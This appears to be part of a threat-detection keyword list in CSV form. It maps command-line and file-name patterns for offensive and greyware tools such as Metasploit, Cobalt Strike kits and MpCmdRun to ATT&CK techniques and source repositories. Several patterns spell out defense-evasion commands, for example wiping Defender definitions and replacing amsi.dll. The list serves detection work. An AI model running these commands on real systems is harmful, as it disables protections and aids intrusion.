+"*mouseshaker.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A"
+"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. 
Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8640","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z"
+"*Mozilla/5.0 (*-bit) dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z"
+"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*mozlz4-win32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*mpcaainmfjjigeicjnlkdfajbioopjko*","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*MpCmdRun.exe -RemoveDefinitions -All*","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
+"*MpCmdRun.exe* -disable*","greyware_tool_keyword","MpCmdRun","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
+"*MpCmdRun.exe* -RemoveDefinitions -All*","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*mpgn/BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z"
+"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*mr.un1k0d3r@gmail.com*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z"
+"*Mr-B0b/SpaceRunner*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*Mr-Cyb3rgh0st/Excel-Exploit*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z"
+"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - 
TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
+"*mremoteng_decrypt.py*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z"
+"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*Mr-Un1k0d3r*","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. 
Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ms14-068.py -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ms14-068.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2049","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z"
+"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*MSBuild.exe NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*MSBuildShell*","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). 
It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","274","81","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z"
+"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*msedge* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A"
+"*msedge* --headless --disable-gpu --remote-debugging-port=*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html","1","1","N/A","5","10","N/A","N/A","N/A","N/A"
+"*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_cve_extracter.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_payload.ps1*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*msf-auxiliarys*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*msfconsole *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 